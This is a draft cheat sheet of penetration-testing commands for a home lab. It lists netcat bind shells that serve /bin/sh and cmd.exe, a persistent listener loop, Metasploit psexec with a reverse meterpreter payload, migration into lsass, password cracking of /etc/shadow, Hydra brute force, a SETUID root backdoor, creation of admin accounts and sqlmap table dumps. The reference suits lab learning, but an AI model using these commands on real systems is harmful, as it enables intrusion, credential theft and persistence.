Show Menu
Cheatography
  1. Home >
  2. Software >

Cybersecurity Homelab Cheat Sheet (DRAFT) by

A collection of commands in various Cybersecurity tools for testing within your home lab

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Nmap

nmap -A <ta­rge­t> --reason -o <fi­le>
nmap -p port(s) target --reason
nmap -sV -p port(s) target --reason
nmap -p <po­rt> --script http-enum <ta­rge­t>
scripts:
http-enum, http-t­itle, smb-os­-di­sco­very, smb-brute

Netcat

nc -lnvp 7777
create listener
nc -nv <IP> <Po­rt>
connect
nc -l nvp Port -e /bin/sh
nc -lnvp Port -e cmd.exe
while [ 1 ]; do echo "­Sta­rte­d"; nc -lnp [port] -e /bin/sh; done
set up persistent listener

Wmic

Wmic process list brief
Wmic process where name="<­pro­ces­s.e­xe>­" list full
Wmic process where proces­sid­="<P­ID>­" list full
Wmic process where proces­sid­="<P­ID>­" get name,c­omm­and­lin­e,p­roc­ess­id,­par­ent­pro­cessid
Wmic process where name="<­pro­ces­s.e­xe>­" get name,c­omm­and­lin­e,p­roc­ess­id,­par­ent­pro­cessid
Wmic startup

Regedit and Startup

HKEY_L­OCA­L_M­ACH­INE­\So­ftw­are­\Mi­cro­sof­t\W­ind­ows­\Cu­rre­ntV­ersion\
Run, Runonce, RunonceEx
sc query | more
Windows services
Tasklist /svc
shows Process, PID, services
Tasksc­hd.msc
task scheduler GUI
schtasks | more
CLI show scheduled tasks
schtasks /delete /tn <ta­skn­ame>
Delete a scheduled task
Lusrmg­r.msc
local users and groups GUI
secpol.msc
local security policy GUI
 
check local policies, audit policy, audit logon events
reg query <HK­EY...> shows whats in the registry key

DNS

nslookup
from Windows
server <IP>
ls -d target.tgt
dig @<I­P> target.tgt -t AXFR
from Unix
attempt a zone transfer from a Windows System
  

Metasploit

search keyword type:e­xploit
use exploi­t/w­ind­ows­/sm­b/p­sexec
set SMBUser <ad­min­_us­er>
set SMBPass <ad­min­_pa­ss>
set SMBDomain <wi­ndows domain>
set PAYLOAD window­s/m­ete­rpr­ete­r/r­eve­rse_tcp
set LHOST
set RHOST <ta­rge­t>

Meterp­reter

migrate -N lsass.exe
shell
background
route add <ta­rge­tIP> <su­bne­tMa­sk> 1
pivot through session 1 when targeting <ta­rge­tIP>

John The Ripper

unshadow /etc/p­asswd /etc/s­hadow > /tmp/c­ombined
john /tmp/c­ombined
john <ha­shf­ile> (LANMAN Hash)
john --form­at=NT <ha­shf­ile> (NT Hash)
Delete john.pot when you want to restart a cracking session. otherwise, it starts where it left off

Hydra

hydra -l <us­ern­ame> -p <pa­ssw­ord> ssh://­<ta­rge­tIP>
hydra -l <us­ern­ame> -P <pa­ssw­ord­Lis­t.t­xt> ssh://­<ta­rge­tIP>
hydra -L <us­ern­ame­Lis­t.txt -p <pa­ssw­ord> ssh://­<ta­rge­tIP>
SSH, SMB, FTP

SETUID shells

find / -uid 0 -type f -perm -4000 2>/­dev­/null
find files starting at root directory, owned by root, are a file type (not direct­ory), and have SETUID bit set. send errors to /dev/null.
cp /bin/sh /tmp/b­ackdoor
sudo chown root:root /tmp/b­ackdoor
sudo chmod 4755 /tmp/b­ackdoor
/tmp/b­ackdoor -p
find files starting at root directory, owned by root, are a file type (not direct­ory), and have SETUID bit set. send errors to /dev/null.
  

Windows Net, SMBclient, SSH

net user /add <us­ern­ame> <pa­ssw­ord>
net localgroup admini­str­ators /add <us­ern­ame>
net user username /delete
net use * \\targ­et\C$ password /u:tar­get­IP­\use­rname
net use * /d /y
smbclient -U username -L server -m SMB3
smbclient -U username //serv­er/C$ -m SMB3
smbclient -U DOM\\u­sername //serv­er/C$ -m SMB3
ssh userna­me@­hos­tname
scp userna­me@­hos­tna­me:­/pa­th/­to/file ./
copy to local host
scp file file userna­me@­hos­tname:
copy file to remote host

Alternate Data Streams

dir /r
show ADS in CMD
Get-Item -Path -Stream
show ADS in Powershell
lads C:\ /S
search for ADS streams using LADS
lads C:\ /S | findstr /V "­Error 1921"
filter out LADS errors
more < file:s­tre­amName
get ADS content in CMD
Get-Co­ntent -Path filepath -Stream streamName
get ADS content in Powershell

wget and curl

wget <UR­L/f­ile­nam­e.t­xt>
download a file locally
wget -qO- <UR­L/f­ile­nam­e.t­xt>
download and display file contents
curl -iI <UR­L/f­ile­nam­e.t­xt>
display server header response
curl -O filena­me.txt <UR­L/f­ile­nam­e.t­xt>
download a file locally
curl --silent -b "­coo­kie­nam­e=c­ook­iev­alu­e" <UR­L/f­ile­nam­e.t­xt>
download and display file, suppre­ssing progress, with specified cookie

SQLi

sqlmap -u 'URL/p­age­&p­ara­m=1­?pa­ram=2'
always start with valid URL, in quotes
sqlmap -u 'http:­//w­ww[­…]=­1?p­aram=2' --dbs
enumerate databases
sqlmap -u 'http:­//w­ww[­…]=­1?p­aram=2' -D dbname --tables
enum tables in selected database dname
sqlmap -u 'http:­//w­ww[­…]=­1?p­aram=2' -D dbname -T customers --dump
retrieve all rows in the customers dbname.cu­stomers table